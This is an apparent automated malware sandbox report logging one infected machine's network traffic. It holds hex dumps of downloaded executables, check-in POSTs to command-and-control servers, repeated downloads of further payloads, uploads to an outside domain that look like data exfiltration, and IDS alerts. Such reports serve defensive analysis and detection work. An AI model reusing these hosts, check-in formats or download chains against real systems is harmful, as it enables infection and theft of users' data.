de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 70 7a 68 69 62 67 75 00 80 19 00 00 a0 30 00 00 7a 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 62 61 73 75 67 6a 69 00 10 00 00 00 20 4a 00 00 04 00 00 00 70 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4a 00 00 22 00 00 00 74 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 Jan 2025 14:42:32 GMTServer: Apache/2.4.62 (Win64) PHP/8.4.2 OpenSSL/3.1.7Last-Modified: Sat, 25 Jan 2025 14:32:27 GMTETag: "2eda0-62c88b660cb69"Accept-Ranges: bytesContent-Length: 191904Vary: Accept-EncodingContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 05 c3 6a 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 3e 02 00 00 84 00 00 00 00 00 00 2e 5d 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 5c 02 00 57 00 00 00 00 60 02 00 cc 81 00 00 00 00 00 00 00 00 00 00 00 c4 02 00 a0 29 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 3d 02 00 00 20 00 00 00 3e 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 cc 81 00 00 00 60 02 00 00 82 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 03 00 00 02 00 00 00 c2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 5d 02 00 00 00 00 00 48 00 00 00 02 00 05 00 24 5c 01 00 b0 00 01 00 01 00 00 00 69 01 00 06 30 57 01 00 f3 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c2 18 00 b8 34 12 07 80 66 b8 32 00 b0 57 c3 1e 02 28 1f 00 00 0a 2a 2e 73 89 01 00 06 80 1e 00 00 04 2a 2e 73 76 01 00 06 80 1f 00 00 04 2a 16 03 14 fe 03 2a 56 28 7e 00 00 06 80 2f 00 00 04 28 7f 00 00 06 80 30 00 00 04 2a 2e 73 b6 01 00 06 80 31 00 00 04 2a 1e 03 6f 85 00 00 0a 2a 1e 17 80 34 00 00 04 2a 2e 73 c9 01 00 06 80 35 00 00 04 2a 1a 28 bb 01 00 06 2a 2e 73 65 00 00 0a 80 39 00 00 04 2a 2e 73 d5 00 00 0a 80 41 00 00 04 2a 22 02 28 1f 00 00 0a 00 2a 1a 28 13 04 00 06 2a be 16 80 b5 00 00 04 72 55 1b 00 70 80 b6 00 00 04 20 f1 9f 05 f0 80 b7 00 00 04 72 6d 1b 00 70 80 b8 00 00 04 20 4a 09 5e b6 80 b9 00 00 04 2a 1a 28 77 03 00 06 2a f6 17 80 c5 00 00 04 72 45 1c 00 70 80 c6 00 00 04 21 4a d3 85 17 00 00 00 00 80 c7 00 00 04 17 80 c8 00 00 04 72 5b 1c 00 70 80 c9 00 00 04 21 bf 0f 2e 7f 00 00 00 00 80 ca 00 00 04 2a 32 28 59 03 00 06 2a 28 ba 03 00 06 2a 1a 28 17 04 00 06 2a 1a 28 63
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:42:55 GMTContent-Type: application/octet-streamContent-Length: 1904640Last-Modified: Sun, 26 Jan 2025 13:23:28 GMTConnection: keep-aliveETag: "67963750-1d1000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 44 f0 76 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 30 04 00 00 b8 00 00 00 00 00 00 00 00 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4b 00 00 04 00 00 4d b1 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 60 05 00 6d 00 00 00 00 50 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 84 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 50 05 00 00 02 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 70 05 00 00 02 00 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 71 74 72 6d 6e 73 6b 00 50 1a 00 00 a0 30 00 00 50 1a 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 6b 6b 78 6d 7a 79 00 10 00 00 00 f0 4a 00 00 04 00 00 00 ea 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4b 00 00 22 00 00 00 ee 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:43:04 GMTContent-Type: application/octet-streamContent-Length: 3672387Last-Modified: Sun, 26 Jan 2025 10:48:58 GMTConnection: keep-aliveETag: "6796131a-380943"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:43:15 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Fri, 24 Jan 2025 15:07:02 GMTConnection: keep-aliveETag: "6793ac96-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 38 30 44 31 36 33 39 32 46 30 32 34 36 39 31 37 33 31 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 72 61 74 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="hwid"9480D16392F02469173176------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="build"brat------DHIECGCAEBFIIDHIDGIE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /manager/files/dedicleb.exe HTTP/1.1Host: 95.164.114.247
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053899001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 185.215.113.39If-Modified-Since: Sun, 26 Jan 2025 13:23:28 GMTIf-None-Match: "67963750-1d1000"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 35 33 39 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1053900001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 39 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053901001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 39 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053902001&unit=246122658369
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49741 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49763 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49796 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49999 -> 95.164.114.247:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50001 -> 185.215.113.39:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50002 -> 185.215.113.39:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50005 -> 185.215.113.39:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50008 -> 185.215.113.39:80
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UM9CNDVCN2PVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12823Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MUAE5FGINOQJRJKGDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15099Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2YRGEF3QTSCTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19927Host: toppyneedus.biz
